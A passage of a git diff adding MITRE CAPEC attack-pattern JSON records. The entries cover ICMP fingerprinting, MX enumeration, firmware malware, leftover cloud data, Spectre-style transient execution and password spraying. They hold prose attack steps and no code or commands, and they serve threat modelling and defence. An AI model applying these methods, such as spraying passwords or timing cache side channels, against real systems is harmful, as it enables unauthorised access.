installed by the victim operating system disguised as a legitimate software update from the software vendor." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47" + ], + "x_capec_prerequisites": [ + "The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.", + "The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature." + ], + "x_capec_skills_required": { + "High": "Technical understanding of how signature verification algorithms work with data and applications" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f.json new file mode 100644 index 0000000000000000000000000000000000000000..bb5730e3f70e17af710e8e58e4efa3b992cded3a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f.json @@ -0,0 +1,87 @@ +{ + "id": "bundle--2fd0055a-1a51-4263-94ea-00390cd366ce", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. This allows the attacker to construct a fingerprint of specific OS behaviors.", + "external_references": [ + { + "external_id": "CAPEC-332", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/332.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP 'ID' Field Error Message Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json new file mode 100644 index 0000000000000000000000000000000000000000..ad822c4b224befbb09c40ad72b8f4a164d4ab435 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304.json @@ -0,0 +1,67 @@ +{ + "id": "bundle--7aa617f5-ad93-45ca-9052-108959f87a6c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.", + "external_references": [ + { + "external_id": "CAPEC-290", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Enumerate Mail Exchange (MX) Records", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The adversary requires access to a DNS server that will return the MX records for a network." + ], + "x_capec_resources_required": [ + "A command-line utility or other application capable of sending requests to the DNS server is necessary." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json new file mode 100644 index 0000000000000000000000000000000000000000..1b087b413c6c437e6a6e116836bc57b064f3fecd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366.json @@ -0,0 +1,74 @@ +{ + "id": "bundle--e523d9a5-bba2-4b44-b731-572b4503a6b9", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ", + "external_references": [ + { + "external_id": "CAPEC-677", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/677.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ", + "external_id": "REF-685", + "source_name": "reference_from_CAPEC", + "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild" + } + ], + "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Server Motherboard Compromise", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json new file mode 100644 index 0000000000000000000000000000000000000000..80f14f7e8e1c1ec18e6b5279cca63e85c71db400 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96.json @@ -0,0 +1,70 @@ +{ + "id": "bundle--3a4054b5-32d2-4144-bdb3-e245b0d7d07a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "external_id": "CAPEC-546", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "external_id": "REF-461", + "source_name": "reference_from_CAPEC", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf" + } + ], + "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Incomplete Data Deletion in a Multi-Tenant Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse directory structure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json new file mode 100644 index 0000000000000000000000000000000000000000..d5e21b6f883fa6b84b64e3e1c874ffd8a32fea3b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json @@ -0,0 +1,133 @@ +{ + "id": "bundle--5c484e30-9b92-40e0-83d8-41e3beaef4d6", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.", + "external_references": [ + { + "external_id": "CAPEC-663", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/663.html" + }, + { + "external_id": "CWE-1037", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1037.html" + }, + { + "external_id": "CWE-1303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1303.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology", + "external_id": "REF-637", + "source_name": "reference_from_CAPEC", + "url": "https://spectreattack.com/spectre.pdf" + }, + { + "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology", + "external_id": "REF-638", + "source_name": "reference_from_CAPEC", + "url": "https://meltdownattack.com/meltdown.pdf" + }, + { + "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and Defenses, 2019--05---15, Graz University of Technology", + "external_id": "REF-639", + "source_name": "reference_from_CAPEC", + "url": "https://arxiv.org/abs/1811.05441" + }, + { + "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering", + "external_id": "REF-640", + "source_name": "reference_from_CAPEC", + "url": "https://eprint.iacr.org/2016/613.pdf" + }, + { + "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum", + "external_id": "REF-641", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic", + "external_id": "REF-642", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA", + "external_id": "REF-643", + "source_name": "reference_from_CAPEC", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A" + } + ], + "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploitation of Transient Instruction Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

    2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

  2. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

    3. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

    3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

    2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU." + ], + "x_capec_resources_required": [ + "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.", + "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json new file mode 100644 index 0000000000000000000000000000000000000000..dc5a7164180dbb548ef3fe44f72352f9c1412739 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--74b9eb9f-7dd5-4eda-81d5-8a2cd5041ccf", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-566", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/566.html" + } + ], + "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Dump Password Hashes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d.json new file mode 100644 index 0000000000000000000000000000000000000000..d218c0dd7477b1a9321f7dd8868e92afe2228dad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d.json @@ -0,0 +1,141 @@ +{ + "id": "bundle--fae5e517-e599-4b89-9501-4401ee205d22", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.\n ", + "external_references": [ + { + "external_id": "CAPEC-565", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Spraying", + "external_id": "T1110.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/003" + }, + { + "description": "ACSC Releases Advisory on Password Spraying Attacks, 2019--08---08, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-565", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/current-activity/2019/08/08/acsc-releases-advisory-password-spraying-attacks" + }, + { + "description": "Andy Greenberg, A notorious Iranian hacking crew is targeting industrial control systems, 2019--11---23, Ars Technica", + "external_id": "REF-566", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2019/11/a-notorious-iranian-hacking-crew-is-targeting-industrial-control-systems/" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "id": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Spraying", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user selects the phrase \"Password123\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.", + "The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target's password policy: Determine the password policies of the target system/application.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

  2. Select passwords: Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)

    3. Techniques
    Select passwords based on common use or a particular user's additional details.
    Select passwords based on the target's password complexity policies.

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.

    2. Techniques
    Manually or automatically enter the first password for each known user account through the target's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Iterate through the remaining passwords for each known user account.
